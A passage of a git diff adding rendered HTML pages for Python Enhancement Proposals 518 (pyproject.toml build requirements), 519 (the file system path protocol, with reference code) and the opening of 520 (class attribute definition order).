Using an executable file to specify build requirements under distutils +isn’t an issue as distutils is part of Python’s standard library. +Having the build tool as part of Python means that a setup.py has +no external dependency that a project maintainer needs to worry about +to build a distribution of their project. There was no need to specify +any dependency information as the only dependency is Python.

+

But when a project chooses to use setuptools, the use of an executable +file like setup.py becomes an issue. You can’t execute a +setup.py file without knowing its dependencies, but currently +there is no standard way to know what those dependencies are in an +automated fashion without executing the setup.py file where that +information is stored. It’s a catch-22 of a file not being runnable +without knowing its own contents which can’t be known programmatically +unless you run the file.

+

Setuptools tried to solve this with a setup_requires argument to +its setup() function [3]. This solution has a number +of issues, such as:

+
    +
  • No tooling (besides setuptools itself) can access this information +without executing the setup.py, but setup.py can’t be +executed without having these items installed.
  • +
  • While setuptools itself will install anything listed in this, they +won’t be installed until during the execution of the setup() +function, which means that the only way to actually use anything +added here is through increasingly complex machinations that delay +the import and usage of these modules until later on in the +execution of the setup() function.
  • +
  • This cannot include setuptools itself nor can it include a +replacement to setuptools, which means that projects such as +numpy.distutils are largely incapable of utilizing it and +projects cannot take advantage of newer setuptools features until +their users naturally upgrade the version of setuptools to a newer +one.
  • +
  • The items listed in setup_requires get implicitly installed whenever you execute the setup.py, but one of the common ways that the setup.py is executed is via another tool, such as pip, which is already managing dependencies. This means that a command like pip install spam might end up having both pip and setuptools downloading and installing packages, and end users needing to configure both tools (and for setuptools without being in control of the invocation) to change settings like which repository it installs from. It also means that users need to be aware of the discovery rules for both tools, as one may support different package formats or determine the latest version differently.
  • +
+

This has culminated in a situation where use of setup_requires is rare, where projects tend to either simply copy and paste snippets between setup.py files or they eschew it altogether in favor of simply documenting elsewhere what they expect the user to have manually installed prior to attempting to build or install their project.

+

All of this has led pip [4] to simply assume that setuptools is necessary when executing a setup.py file. The problem with this, though, is that it doesn’t scale if another project begins to gain traction in the community as setuptools has. It also prevents other projects from gaining traction due to the friction required to use it with a project when pip can’t infer the fact that something other than setuptools is required.

+

This PEP attempts to rectify the situation by specifying a way to list +the minimal dependencies of the build system of a project in a +declarative fashion in a specific file. This allows a project to list +what build dependencies it has to go from e.g. source checkout to +wheel, while not falling into the catch-22 trap that a setup.py +has where tooling can’t infer what a project needs to build itself. +Implementing this PEP will allow projects to specify what build system +they depend on upfront so that tools like pip can make sure that they +are installed in order to run the build system to build the project.

+

To provide more context and motivation for this PEP, think of the +(rough) steps required to produce a built artifact for a project:

+
    +
  1. The source checkout of the project.
  2. Installation of the build system.
  3. Execute the build system.
+

This PEP covers step #2. PEP 517 covers step #3, including how to have +the build system dynamically specify more dependencies that the build +system requires to perform its job. The purpose of this PEP though, is +to specify the minimal set of requirements for the build system to +simply begin execution.

+
+
+

Specification

+
+

File Format

+

The build system dependencies will be stored in a file named +pyproject.toml that is written in the TOML format [6].

+

This format was chosen as it is human-usable (unlike JSON [7]), it is flexible enough (unlike configparser [9]), stems from a standard (also unlike configparser [9]), and it is not overly complex (unlike YAML [8]). The TOML format is already in use by the Rust community as part of their Cargo package manager [14], and in private email its developers stated that they have been quite happy with their choice of TOML. A more thorough discussion as to why various alternatives were not chosen can be read in the Other file formats section. The authors do realize, though, that the choice of configuration file format is ultimately subjective: a choice had to be made, and the authors prefer TOML for this situation.

+

Below we list the tables that tools are expected to recognize/respect. +Tables not specified in this PEP are reserved for future use by other +PEPs.

+
+
+

build-system table

+

The [build-system] table is used to store build-related data. +Initially only one key of the table will be valid and is mandatory +for the table: requires. This key must have a value of a list +of strings representing PEP 508 dependencies required to execute the +build system (currently that means what dependencies are required to +execute a setup.py file).

+

For the vast majority of Python projects that rely upon setuptools, +the pyproject.toml file will be:

+
[build-system]
+# Minimum requirements for the build system to execute.
+requires = ["setuptools", "wheel"]  # PEP 508 specifications.
+
+
+

Because the use of setuptools and wheel is so expansive in the community at the moment, build tools are expected to use the example configuration file above as their default semantics when a pyproject.toml file is not present.

+

Tools should not require the existence of the [build-system] table. +A pyproject.toml file may be used to store configuration details +other than build-related data and thus lack a [build-system] table +legitimately. If the file exists but is lacking the [build-system] +table then the default values as specified above should be used. +If the table is specified but is missing required fields then the tool +should consider it an error.
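
+

For illustration only, here is a minimal sketch of how a build frontend might resolve the build requirements under these rules. It assumes Python 3.11’s tomllib purely for brevity (this PEP predates that module; contemporary tools vendored a TOML parser instead):

+
import os
+import tomllib  # assumed for this sketch only; not part of this PEP
+
+# Default semantics when pyproject.toml or [build-system] is absent.
+DEFAULT_REQUIRES = ["setuptools", "wheel"]
+
+def get_build_requires(project_dir):
+    """Return the PEP 508 build requirements for a source tree."""
+    path = os.path.join(project_dir, "pyproject.toml")
+    if not os.path.exists(path):
+        return DEFAULT_REQUIRES  # no file: use the default semantics
+    with open(path, "rb") as f:
+        data = tomllib.load(f)
+    if "build-system" not in data:
+        return DEFAULT_REQUIRES  # table legitimately absent: defaults again
+    try:
+        return data["build-system"]["requires"]
+    except KeyError:
+        # Table present but missing its mandatory key: an error per this PEP.
+        raise RuntimeError("[build-system] table is missing 'requires'")
+
+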

+
+
+

tool table

+

The [tool] table is where any tool related to your Python +project, not just build tools, can have users specify configuration +data as long as they use a sub-table within [tool], e.g. the +flit tool would store its +configuration in [tool.flit].

+

We need some mechanism to allocate names within the tool.* +namespace, to make sure that different projects don’t attempt to use +the same sub-table and collide. Our rule is that a project can use +the subtable tool.$NAME if, and only if, they own the entry for +$NAME in the Cheeseshop/PyPI.
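
+

As a sketch, a tool would read only its own sub-table out of the parsed file; the flit key below is invented purely for illustration (tomllib is again assumed):

+
import tomllib  # assumed for this sketch only
+
+doc = tomllib.loads("""
+[build-system]
+requires = ["flit"]
+
+[tool.flit]
+module = "spam"  # hypothetical key, for illustration only
+""")
+
+# Each tool looks only inside its own [tool.$NAME] sub-table.
+flit_config = doc.get("tool", {}).get("flit", {})
+print(flit_config)  # -> {'module': 'spam'}
+
+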

+
+
+

JSON Schema

+

To provide a type-specific representation of the resulting data from +the TOML file for illustrative purposes only, the following JSON +Schema [15] would match the data format:

+
{
+    "$schema": "http://json-schema.org/schema#",
+
+    "type": "object",
+    "additionalProperties": false,
+
+    "properties": {
+        "build-system": {
+            "type": "object",
+            "additionalProperties": false,
+
+            "properties": {
+                "requires": {
+                    "type": "array",
+                    "items": {
+                        "type": "string"
+                    }
+                }
+            },
+            "required": ["requires"]
+        },
+
+        "tool": {
+            "type": "object"
+        }
+    }
+}
+
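
Again for illustration only, the parsed file could be checked against that schema with the third-party jsonschema package (an assumption of this sketch, not something this PEP requires):

+
import tomllib                   # assumed, as in the sketches above
+from jsonschema import validate  # third-party 'jsonschema' package
+
+SCHEMA = {
+    "$schema": "http://json-schema.org/schema#",
+    "type": "object",
+    "additionalProperties": False,
+    "properties": {
+        "build-system": {
+            "type": "object",
+            "additionalProperties": False,
+            "properties": {
+                "requires": {"type": "array", "items": {"type": "string"}},
+            },
+            "required": ["requires"],
+        },
+        "tool": {"type": "object"},
+    },
+}
+
+data = tomllib.loads('[build-system]\nrequires = ["setuptools", "wheel"]')
+validate(instance=data, schema=SCHEMA)  # raises ValidationError if invalid
+
+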
+
+
+
+
+

Rejected Ideas

+
+

A semantic version key

+

For future-proofing the structure of the configuration file, a +semantics-version key was initially proposed. Defaulting to 1, +the idea was that if any semantics changes to previously defined keys +or tables occurred which were not backwards-compatible, then the +semantics-version would be incremented to a new number.

+

In the end, though, it was decided that this was a premature +optimization. The expectation is that changes to what is pre-defined +semantically in the configuration file will be rather conservative. +And in the instances where a backwards-incompatible change would have +occurred, different names can be used for the new semantics to avoid +breaking older tools.

+
+
+

A more nested namespace

+

An earlier draft of this PEP had a top-level [package] table. The +idea was to impose some scoping for a semantics versioning scheme +(see A semantic version key for why that idea was rejected). +With the need for scoping removed, the point of having a top-level +table became superfluous.

+
+
+

Other table names

+

Another name proposed for the [build-system] table was +[build]. The alternative name is shorter, but doesn’t convey as +much of the intention of what information is stored in the table. After +a vote on the distutils-sig mailing list, the current name won out.

+
+
+

Other file formats

+

Several other file formats were put forward for consideration, all +rejected for various reasons. Key requirements were that the format +be editable by human beings and have an implementation that can be +vendored easily by projects. This outright excluded certain formats +like XML which are not friendly towards human beings and were never +seriously discussed.

+
+

Overview of file formats considered

+

The key reasons for rejecting the other alternatives considered are +summarised in the following sections, while the full review (including +positive arguments in favour of TOML) can be found at [16].

+

TOML was ultimately selected as it provided all the features we +were interested in, while avoiding the downsides introduced by +the alternatives.

+
Feature                    TOML   YAML   JSON   CFG/INI
Well-defined               yes    yes    yes
Real data types            yes    yes    yes
Reliable Unicode           yes    yes    yes
Reliable comments          yes    yes
Easy for humans to edit    yes    ??            ??
Easy for tools to edit     yes    ??     yes    ??
In standard library                      yes    yes
Easy for pip to vendor     yes           n/a    n/a
+

(“??” in the table indicates items where most folks would be +inclined to answer “yes”, but there turn out to be a lot of +quirks and edge cases that arise in practice due to either +the lack of a clear specification, or else the underlying +file format specification being surprisingly complicated)

+

The pytoml TOML parser is ~300 lines of pure Python code, +so being outside the standard library didn’t count heavily +against it.

+

Python literals were also discussed as a potential format, but +weren’t considered in the file format review (since they’re not +a common pre-existing file format).

+
+
+

JSON

+

The JSON format [7] was initially considered but quickly +rejected. While great as a human-readable, string-based data exchange +format, the syntax does not lend itself to easy editing by a human +being (e.g. the syntax is more verbose than necessary while not +allowing for comments).

+

An example JSON file for the proposed data would be:

+
{
+    "build": {
+        "requires": [
+            "setuptools",
+            "wheel>=0.27"
+        ]
+    }
+}
+
+
+
+
+

YAML

+

The YAML format [8] was designed to be a superset of JSON +[7] while being easier to work with by hand. There are three main +issues with YAML.

+

One is that the specification is large: 86 pages if printed on +letter-sized paper. That leaves the possibility that someone may use a +feature of YAML that works with one parser but not another. It has +been suggested to standardize on a subset, but that basically means +creating a new standard specific to this file which is not tractable +long-term.

+

Two is that YAML itself is not safe by default. The specification +allows for the arbitrary execution of code which is best avoided when +dealing with configuration data. It is of course possible to avoid +this behavior – for example, PyYAML provides a safe_load operation +– but if any tool carelessly uses load instead then they open +themselves up to arbitrary code execution. While this PEP is focused on +the building of projects which inherently involves code execution, +other configuration data such as project name and version number may +end up in the same file someday where arbitrary code execution is not +desired.

+

And finally, the most popular Python implementation of YAML is PyYAML [10], which is a large project of a few thousand lines of code and an optional C extension module. While in and of itself this isn’t necessarily an issue, it becomes more of a problem for projects like pip which would most likely need to vendor PyYAML as a dependency so as to be fully self-contained (otherwise you end up with your install tool needing an install tool to work). A proof-of-concept re-working of PyYAML has been done to see how easy it would be to potentially vendor a simpler version of the library, which shows it is a possibility.

+

An example YAML file is:

+
build:
+    requires:
+        - setuptools
+        - wheel>=0.27
+
+
+
+
+

configparser

+

An INI-style configuration file based on what configparser [9] accepts was considered. Unfortunately there is no specification of what configparser accepts, leading to support skew between versions. For instance, what ConfigParser in Python 2.7 accepts is not the same as what configparser in Python 3 accepts. While one could standardize on what Python 3 accepts and simply vendor the backport of the configparser module, that does mean this PEP would have to codify that the backport of configparser must be used by all projects wishing to consume the metadata specified by this PEP. This is overly restrictive and could lead to confusion if someone is not aware that a specific version of configparser is expected.

+

An example INI file is:

+
[build]
+requires =
+    setuptools
+    wheel>=0.27
+
+
+
+
+

Python literals

+

Someone proposed using Python literals as the configuration format. +The file would contain one dict at the top level, with the data all +inside that dict, with sections defined by the keys. All Python +programmers would be used to the format, there would implicitly be no +third-party dependency to read the configuration data, and it can be +safe if parsed by ast.literal_eval() [13]. +Python literals can be identical to JSON, with the added benefit of +supporting trailing commas and comments. In addition, Python’s richer +data model may be useful for some future configuration needs (e.g. non-string +dict keys, floating point vs. integer values).

+

On the other hand, Python literals are a Python-specific format, and it is anticipated that these data may need to be read by packaging tools, etc. that are not written in Python.

+

An example Python literal file for the proposed data would be:

+
# The build configuration
+{"build": {"requires": ["setuptools",
+                        "wheel>=0.27", # note the trailing comma
+                        # "numpy>=1.10" # a commented out data line
+                        ]
+# and here is an arbitrary comment.
+           }
+ }
+
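
As a quick sketch, such a literal can be parsed safely with ast.literal_eval(), which evaluates literals only and never executes code:

+
import ast
+
+text = """{"build": {"requires": ["setuptools",
+                        "wheel>=0.27",  # note the trailing comma
+                        ]}}"""
+config = ast.literal_eval(text)
+print(config["build"]["requires"])  # -> ['setuptools', 'wheel>=0.27']
+
+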
+
+
+
+
+

Sticking with setup.cfg

+

There are two issues with setup.cfg used by setuptools as a general format. One is that it is an .ini file, which has the issues mentioned in the configparser discussion above. The other is that the schema for that file has never been rigorously defined and thus it’s unknown which format would be safe to use going forward without potentially confusing setuptools installations.

+
+
+

Other file names

+

Several other file names were considered and rejected (although this +is very much a bikeshedding topic, and so the decision comes down to +mostly taste).

+
+
pysettings.toml
Most reasonable alternative.
+
pypa.toml
While it makes sense to reference the PyPA [11], it is a +somewhat niche term. It’s better to have the file name make sense +without having domain-specific knowledge.
+
pybuild.toml
From the restrictive perspective of this PEP this filename makes +sense, but if any non-build metadata ever gets added to the file +then the name ceases to make sense.
+
pip.toml
Too tool-specific.
+
meta.toml
Too generic; project may want to have its own metadata file.
+
setup.toml
While in keeping with tradition thanks to setup.py, it does not necessarily match what the file may contain in the future (e.g. is knowing the name of a project inherently part of its setup?).
+
pymeta.toml
Not obvious to newcomers to programming and/or Python.
+
pypackage.toml & pypackaging.toml
Name conflation of what a “package” is (project versus namespace).
+
pydevelop.toml
The file may contain details not specific to development.
+
pysource.toml
Not directly related to source code.
+
pytools.toml
Misleading as the file is (currently) aimed at project management.
+
dstufft.toml
Too person-specific. ;)
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0518.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0519/index.html b/pep-0519/index.html new file mode 100644 index 00000000000..3f89d350bca --- /dev/null +++ b/pep-0519/index.html @@ -0,0 +1,667 @@ + + + + + + + + PEP 519 – Adding a file system path protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 519 – Adding a file system path protocol

+
+
Author:
+
Brett Cannon <brett at python.org>, +Koos Zevenhoven <k7hoven at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-May-2016
+
Python-Version:
+
3.6
+
Post-History:
+
11-May-2016, +12-May-2016, +13-May-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a protocol for classes which represent a file system +path to be able to provide a str or bytes representation. +Changes to Python’s standard library are also proposed to utilize this +protocol where appropriate to facilitate the use of path objects where +historically only str and/or bytes file system paths are +accepted. The goal is to facilitate the migration of users towards +rich path objects while providing an easy way to work with code +expecting str or bytes.

+
+
+

Rationale

+

Historically in Python, file system paths have been represented as +strings or bytes. This choice of representation has stemmed from C’s +own decision to represent file system paths as +const char * [3]. While that is a totally serviceable +format to use for file system paths, it’s not necessarily optimal. At +issue is the fact that while all file system paths can be represented +as strings or bytes, not all strings or bytes represent a file system +path. This can lead to issues where any e.g. string duck-types to a +file system path whether it actually represents a path or not.

+

To help elevate the representation of file system paths from their +representation as strings and bytes to a richer object representation, +the pathlib module [4] was provisionally introduced in +Python 3.4 through PEP 428. While considered by some as an improvement +over strings and bytes for file system paths, it has suffered from a +lack of adoption. Typically the key issue listed for the low adoption +rate has been the lack of support in the standard library. This lack +of support required users of pathlib to manually convert path objects +to strings by calling str(path) which many found error-prone.

+

One issue in converting path objects to strings comes from +the fact that the only generic way to get a string representation of +the path was to pass the object to str(). This can pose a +problem when done blindly as nearly all Python objects have some +string representation whether they are a path or not, e.g. +str(None) will give a result that +builtins.open() [5] will happily use to create a new +file.

+

Exacerbating this whole situation is the +DirEntry object [8]. While path objects have a +representation that can be extracted using str(), DirEntry +objects expose a path attribute instead. Having no common +interface between path objects, DirEntry, and any other +third-party path library has become an issue. A solution that allows +any path-representing object to declare that it is a path and a way +to extract a low-level representation that all path objects could +support is desired.

+

This PEP then proposes to introduce a new protocol to be followed by +objects which represent file system paths. Providing a protocol allows +for explicit signaling of what objects represent file system paths as +well as a way to extract a lower-level representation that can be used +with older APIs which only support strings or bytes.

+

Discussions regarding path objects that led to this PEP can be found +in multiple threads on the python-ideas mailing list archive +[1] for the months of March and April 2016 and on +the python-dev mailing list archives [2] during +April 2016.

+
+
+

Proposal

+

This proposal is split into two parts. One part is the proposal of a +protocol for objects to declare and provide support for exposing a +file system path representation. The other part deals with changes to +Python’s standard library to support the new protocol. These changes +will also lead to the pathlib module dropping its provisional status.

+
+

Protocol

+

The following abstract base class defines the protocol for an object +to be considered a path object:

+
import abc
+import typing as t
+
+
+class PathLike(abc.ABC):
+
+    """Abstract base class for implementing the file system path protocol."""
+
+    @abc.abstractmethod
+    def __fspath__(self) -> t.Union[str, bytes]:
+        """Return the file system path representation of the object."""
+        raise NotImplementedError
+
+
+

Objects representing file system paths will implement the +__fspath__() method which will return the str or bytes +representation of the path. The str representation is the +preferred low-level path representation as it is human-readable and +what people historically represent paths as.
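
+

For instance, a minimal sketch of a third-party class implementing the protocol (the class and file name are invented for illustration):

+
import os
+
+class BackupPath:
+    """Toy path object for a file's backup location."""
+
+    def __init__(self, original):
+        self._original = original
+
+    def __fspath__(self):
+        # The low-level str representation of the path.
+        return self._original + ".bak"
+
+# With the os.fspath() function proposed below, consuming code can
+# extract that representation explicitly:
+print(os.fspath(BackupPath("spam.txt")))  # -> 'spam.txt.bak'
+
+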

+
+
+

Standard library changes

+

It is expected that most APIs in Python’s standard library that +currently accept a file system path will be updated appropriately to +accept path objects (whether that requires code or simply an update +to documentation will vary). The modules mentioned below, though, +deserve specific details as they have either fundamental changes that +empower the ability to use path objects, or entail additions/removal +of APIs.

+
+

builtins

+

open() [5] will be updated to accept path objects as +well as continue to accept str and bytes.

+
+
+

os

+

The fspath() function will be added with the following semantics:

+
import typing as t
+
+
+def fspath(path: t.Union[PathLike, str, bytes]) -> t.Union[str, bytes]:
+    """Return the string representation of the path.
+
+    If str or bytes is passed in, it is returned unchanged. If __fspath__()
+    returns something other than str or bytes then TypeError is raised. If
+    this function is given something that is not str, bytes, or os.PathLike
+    then TypeError is raised.
+    """
+    if isinstance(path, (str, bytes)):
+        return path
+
+    # Work from the object's type to match method resolution of other magic
+    # methods.
+    path_type = type(path)
+    try:
+        path = path_type.__fspath__(path)
+    except AttributeError:
+        if hasattr(path_type, '__fspath__'):
+            raise
+    else:
+        if isinstance(path, (str, bytes)):
+            return path
+        else:
+            raise TypeError("expected __fspath__() to return str or bytes, "
+                            "not " + type(path).__name__)
+
+    raise TypeError("expected str, bytes or os.PathLike object, not "
+                    + path_type.__name__)
+
+
+

The os.fsencode() [6] and +os.fsdecode() [7] functions will be updated to accept +path objects. As both functions coerce their arguments to +bytes and str, respectively, they will be updated to call +__fspath__() if present to convert the path object to a str or +bytes representation, and then perform their appropriate +coercion operations as if the return value from __fspath__() had +been the original argument to the coercion function in question.

+

The addition of os.fspath(), the updates to os.fsencode()/os.fsdecode(), and the current semantics of pathlib.PurePath provide the semantics necessary to get the path representation one prefers. For a path object, pathlib.PurePath/Path can be used. To obtain the str or bytes representation without any coercion, os.fspath() can be used. If a str is desired and the encoding of bytes should be assumed to be the default file system encoding, then os.fsdecode() should be used. If a bytes representation is desired and any strings should be encoded using the default file system encoding, then os.fsencode() is used. This PEP recommends using path objects when possible and falling back to string paths as necessary and using bytes as a last resort.

+

Another way to view this is as a hierarchy of file system path +representations (highest- to lowest-level): path → str → bytes. The +functions and classes under discussion can all accept objects on the +same level of the hierarchy, but they vary in whether they promote or +demote objects to another level. The pathlib.PurePath class can +promote a str to a path object. The os.fspath() function can +demote a path object to a str or bytes instance, depending +on what __fspath__() returns. +The os.fsdecode() function will demote a path object to +a string or promote a bytes object to a str. The +os.fsencode() function will demote a path or string object to +bytes. There is no function that provides a way to demote a path +object directly to bytes while bypassing string demotion.
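
+

A short sketch of these promotions and demotions on a POSIX system (results shown in comments):

+
import os
+import pathlib
+
+p = pathlib.PurePath("spam") / "eggs.txt"  # str promoted to a path object
+os.fspath(p)                   # -> 'spam/eggs.txt' (path demoted to str)
+os.fsencode(p)                 # -> b'spam/eggs.txt' (demoted on to bytes)
+os.fsdecode(b"spam/eggs.txt")  # -> 'spam/eggs.txt' (bytes promoted to str)
+
+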

+

The DirEntry object [8] will gain an __fspath__() +method. It will return the same value as currently found on the +path attribute of DirEntry instances.

+

The Protocol ABC will be added to the os module under the name +os.PathLike.

+
+
+

os.path

+

The various path-manipulation functions of os.path [9] +will be updated to accept path objects. For polymorphic functions that +accept both bytes and strings, they will be updated to simply use +os.fspath().

+

During the discussions leading up to this PEP it was suggested that os.path not be updated using an “explicit is better than implicit” argument. The thinking was that since __fspath__() is polymorphic itself it may be better to have code working with os.path extract the path representation from path objects explicitly. There is also the consideration that adding support this deep into the low-level OS APIs will lead to code magically supporting path objects without requiring any documentation updates, leading to potential complaints when it doesn’t work, unbeknownst to the project author.

+

But it is the view of this PEP that “practicality beats purity” in +this instance. To help facilitate the transition to supporting path +objects, it is better to make the transition as easy as possible than +to worry about unexpected/undocumented duck typing support for +path objects by projects.

+

There has also been the suggestion that os.path functions could be +used in a tight loop and the overhead of checking or calling +__fspath__() would be too costly. In this scenario only +path-consuming APIs would be directly updated and path-manipulating +APIs like the ones in os.path would go unmodified. This would +require library authors to update their code to support path objects +if they performed any path manipulations, but if the library code +passed the path straight through then the library wouldn’t need to be +updated. It is the view of this PEP and Guido, though, that this is an +unnecessary worry and that performance will still be acceptable.

+
+
+

pathlib

+

The constructor for pathlib.PurePath and pathlib.Path will be +updated to accept PathLike objects. Both PurePath and Path +will continue to not accept bytes path representations, and so if +__fspath__() returns bytes it will raise an exception.
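
+

A sketch of that constructor behavior, using toy classes invented for illustration:

+
import pathlib
+
+class StrPath:
+    def __fspath__(self):
+        return "spam/eggs.txt"
+
+class BytesPath:
+    def __fspath__(self):
+        return b"spam/eggs.txt"
+
+print(pathlib.PurePath(StrPath()))  # constructs a path object from the str
+try:
+    pathlib.PurePath(BytesPath())   # bytes representations are rejected
+except TypeError as exc:
+    print("rejected:", exc)
+
+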

+

The path attribute will be removed as this PEP makes it +redundant (it has not been included in any released version of Python +and so is not a backwards-compatibility concern).

+
+
+

C API

+

The C API will gain an equivalent function to os.fspath():

+
/*
+    Return the file system path representation of the object.
+
+    If the object is str or bytes, then allow it to pass through with
+    an incremented refcount. If the object defines __fspath__(), then
+    return the result of that method. All other types raise a TypeError.
+*/
+PyObject *
+PyOS_FSPath(PyObject *path)
+{
+    _Py_IDENTIFIER(__fspath__);
+    PyObject *func = NULL;
+    PyObject *path_repr = NULL;
+
+    if (PyUnicode_Check(path) || PyBytes_Check(path)) {
+        Py_INCREF(path);
+        return path;
+    }
+
+    func = _PyObject_LookupSpecial(path, &PyId___fspath__);
+    if (NULL == func) {
+        return PyErr_Format(PyExc_TypeError,
+                            "expected str, bytes or os.PathLike object, "
+                            "not %S",
+                            path->ob_type);
+    }
+
+    path_repr = PyObject_CallFunctionObjArgs(func, NULL);
+    Py_DECREF(func);
+    if (path_repr == NULL) {
+        /* Propagate any exception raised by __fspath__(). */
+        return NULL;
+    }
+    if (!PyUnicode_Check(path_repr) && !PyBytes_Check(path_repr)) {
+        Py_DECREF(path_repr);
+        return PyErr_Format(PyExc_TypeError,
+                            "expected __fspath__() to return str or bytes, "
+                            "not %S",
+                            path_repr->ob_type);
+    }
+
+    return path_repr;
+}
+
+
+
+
+
+
+

Backwards compatibility

+

There are no explicit backwards-compatibility concerns. Unless an +object incidentally already defines a __fspath__() method there is +no reason to expect the pre-existing code to break or expect to have +its semantics implicitly changed.

+

Libraries wishing to support path objects and a version of Python +prior to Python 3.6 and the existence of os.fspath() can use the +idiom of +path.__fspath__() if hasattr(path, "__fspath__") else path.
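
+

For example, a hypothetical helper wrapping that idiom (the function name is invented):

+
def fspath_compat(path):
+    """Best-effort os.fspath() substitute for Pythons before 3.6."""
+    return path.__fspath__() if hasattr(path, "__fspath__") else path
+
+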

+
+
+

Implementation

+

This is the task list for what this PEP proposes to be changed in +Python 3.6:

+
    +
  1. Remove the path attribute from pathlib (done)
  2. Remove the provisional status of pathlib (done)
  3. Add os.PathLike (code and docs done)
  4. Add PyOS_FSPath() (code and docs done)
  5. Add os.fspath() (done)
  6. Update os.fsencode() (done)
  7. Update os.fsdecode() (done)
  8. Update pathlib.PurePath and pathlib.Path (done)
       1. Add __fspath__()
       2. Add os.PathLike support to the constructors
  9. Add __fspath__() to DirEntry (done)
  10. Update builtins.open() (done)
  11. Update os.path (done)
  12. Add a glossary entry for “path-like” (done)
  13. Update “What’s New” (done)
+
+
+

Rejected Ideas

+
+

Other names for the protocol’s method

+

Various names were proposed during discussions leading to this PEP, +including __path__, __pathname__, and __fspathname__. In +the end people seemed to gravitate towards __fspath__ for being +unambiguous without being unnecessarily long.

+
+
+

Separate str/bytes methods

+

At one point it was suggested that __fspath__() only return +strings and another method named __fspathb__() be introduced to +return bytes. The thinking is that by making __fspath__() not be +polymorphic it could make dealing with the potential string or bytes +representations easier. But the general consensus was that returning +bytes will more than likely be rare and that the various functions in +the os module are the better abstraction to promote over direct +calls to __fspath__().

+
+
+

Providing a path attribute

+

To help deal with the issue of pathlib.PurePath not inheriting +from str, originally it was proposed to introduce a path +attribute to mirror what os.DirEntry provides. In the end, +though, it was determined that a protocol would provide the same +result while not directly exposing an API that most people will never +need to interact with directly.

+
+
+

Have __fspath__() only return strings

+

Much of the discussion that led to this PEP revolved around whether +__fspath__() should be polymorphic and return bytes as well as +str or only return str. The general sentiment for this view +was that bytes are difficult to work with due to their +inherent lack of information about their encoding and PEP 383 makes +it possible to represent all file system paths using str with the +surrogateescape handler. Thus, it would be better to forcibly +promote the use of str as the low-level path representation for +high-level path objects.

+

In the end, it was decided that using bytes to represent paths is +simply not going to go away and thus they should be supported to some +degree. The hope is that people will gravitate towards path objects +like pathlib and that will move people away from operating directly +with bytes.

+
+
+

A generic string encoding mechanism

+

At one point there was a discussion of developing a generic mechanism +to extract a string representation of an object that had semantic +meaning (__str__() does not necessarily return anything of +semantic significance beyond what may be helpful for debugging). In +the end, it was deemed to lack a motivating need beyond the one this +PEP is trying to solve in a specific fashion.

+
+
+

Have __fspath__ be an attribute

+

It was briefly considered to have __fspath__ be an attribute +instead of a method. This was rejected for two reasons. One, +historically protocols have been implemented as “magic methods” and +not “magic methods and attributes”. Two, there is no guarantee that +the lower-level representation of a path object will be pre-computed, +potentially misleading users that there was no expensive computation +behind the scenes in case the attribute was implemented as a property.

+

This also indirectly ties into the idea of introducing a path +attribute to accomplish the same thing. This idea has an added issue, +though, of accidentally having any object with a path attribute +meet the protocol’s duck typing. Introducing a new magic method for +the protocol helpfully avoids any accidental opting into the protocol.

+
+
+

Provide specific type hinting support

+

There was some consideration to providing a generic typing.PathLike +class which would allow for e.g. typing.PathLike[str] to specify +a type hint for a path object which returned a string representation. +While potentially beneficial, the usefulness was deemed too small to +bother adding the type hint class.

+

This also removed any desire to have a class in the typing module +which represented the union of all acceptable path-representing types +as that can be represented with +typing.Union[str, bytes, os.PathLike] easily enough and the hope +is users will slowly gravitate to path objects only.

+
+
+

Provide os.fspathb()

+

It was suggested that, to mirror the structure of e.g. os.getcwd()/os.getcwdb(), os.fspath() only return str and that another function named os.fspathb() be introduced that only returned bytes. This was rejected as the purposes of the *b() functions are tied to querying the file system where there is a need to get the raw bytes back. As this PEP does not work directly with data on a file system (though such data may be involved), the view was taken that this distinction is unnecessary. It’s also believed that the need for only bytes will not be common enough to need to support in such a specific manner as os.fsencode() will provide similar functionality.

+
+
+

Call __fspath__() off of the instance

+

An earlier draft of this PEP had os.fspath() calling path.__fspath__() instead of type(path).__fspath__(path). This was changed to be consistent with how other magic methods in Python are resolved.

+
+
+
+

Acknowledgements

+

Thanks to everyone who participated in the various discussions related +to this PEP that spanned both python-ideas and python-dev. Special +thanks to Stephen Turnbull for direct feedback on early drafts of this +PEP. More special thanks to Koos Zevenhoven and Ethan Furman for not +only feedback on early drafts of this PEP but also helping to drive +the overall discussion on this topic across the two mailing lists.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0519.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0520/index.html b/pep-0520/index.html new file mode 100644 index 00000000000..9458de0545a --- /dev/null +++ b/pep-0520/index.html @@ -0,0 +1,547 @@ + + + + + + + + PEP 520 – Preserving Class Attribute Definition Order | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 520 – Preserving Class Attribute Definition Order

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
07-Jun-2016
+
Python-Version:
+
3.6
+
Post-History:
+
07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Note

+

Since compact dict has landed in 3.6, __definition_order__ +has been removed. cls.__dict__ now mostly accomplishes the same +thing instead.

+
+
+

Abstract

+

The class definition syntax is ordered by its very nature. Class +attributes defined there are thus ordered. Aside from helping with +readability, that ordering is sometimes significant. If it were +automatically available outside the class definition then the +attribute order could be used without the need for extra boilerplate +(such as metaclasses or manually enumerating the attribute order). +Given that this information already exists, access to the definition +order of attributes is a reasonable expectation. However, currently +Python does not preserve the attribute order from the class +definition.

+

